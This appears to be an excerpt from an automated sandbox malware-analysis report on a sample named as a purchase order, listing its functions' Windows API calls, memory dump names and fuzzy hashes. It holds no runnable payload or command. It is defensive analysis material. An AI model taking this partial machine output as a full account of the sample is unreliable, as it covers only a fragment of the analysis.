                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                            • __itow.LIBCMT ref: 004699CD
                                                              • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                            • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                            • __itow.LIBCMT ref: 00469A97
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow
                                                            • String ID:
                                                            • API String ID: 3379773720-0
                                                            • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                            • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                            • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                            • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                            Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                            • ScreenToClient.USER32(?,?), ref: 00449A80
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                            • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                            • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                            • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                            Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                            • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                            • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                            • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                            Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                            • GetWindowRect.USER32(?,?), ref: 00441722
                                                            • PtInRect.USER32(?,?,?), ref: 00441734
                                                            • MessageBeep.USER32(00000000), ref: 004417AD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                            • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                            • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                            • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                            Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                            • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                            • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                            • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                            • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                            • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                            Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                            • __isleadbyte_l.LIBCMT ref: 004208A6
                                                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                            • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                            • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                            • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                            Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 004503C8
                                                            • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                            • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                            • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Proc$Parent
                                                            • String ID:
                                                            • API String ID: 2351499541-0
                                                            • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                            • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                            • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                            • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                            Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                            • TranslateMessage.USER32(?), ref: 00442B01
                                                            • DispatchMessageW.USER32(?), ref: 00442B0B
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchTranslate
                                                            • String ID:
                                                            • API String ID: 1795658109-0
                                                            • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                            • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                            • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                            • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                            Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                            • GetCaretPos.USER32(?), ref: 004743B2
                                                            • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                            • GetForegroundWindow.USER32 ref: 004743EE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                            • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                            • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                            • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                            Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                            • _wcslen.LIBCMT ref: 00449519
                                                            • _wcslen.LIBCMT ref: 00449526
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend_wcslen$_wcspbrk
                                                            • String ID:
                                                            • API String ID: 2886238975-0
                                                            • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                            • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                            • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                            • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                            Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __setmode$DebugOutputString_fprintf
                                                            • String ID:
                                                            • API String ID: 1792727568-0
                                                            • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                            • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                            • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                            • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                            Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$AttributesLayered
                                                            • String ID:
                                                            • API String ID: 2169480361-0
                                                            • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                            • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                            • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                            • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                            Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                              • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                              • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                            • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                            • String ID: cdecl
                                                            • API String ID: 3850814276-3896280584
                                                            • Opcode ID: 98dc1614c8a6754c40beb179c63a7fe43b6a080dcdea2315c586b7862fcedbe6
                                                            • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                            • Opcode Fuzzy Hash: 98dc1614c8a6754c40beb179c63a7fe43b6a080dcdea2315c586b7862fcedbe6
                                                            • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                            Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                            • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                            • _memmove.LIBCMT ref: 0046D475
                                                            • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 2502553879-0
                                                            • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                            • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                            • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                            • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                            Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32 ref: 00448C69
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
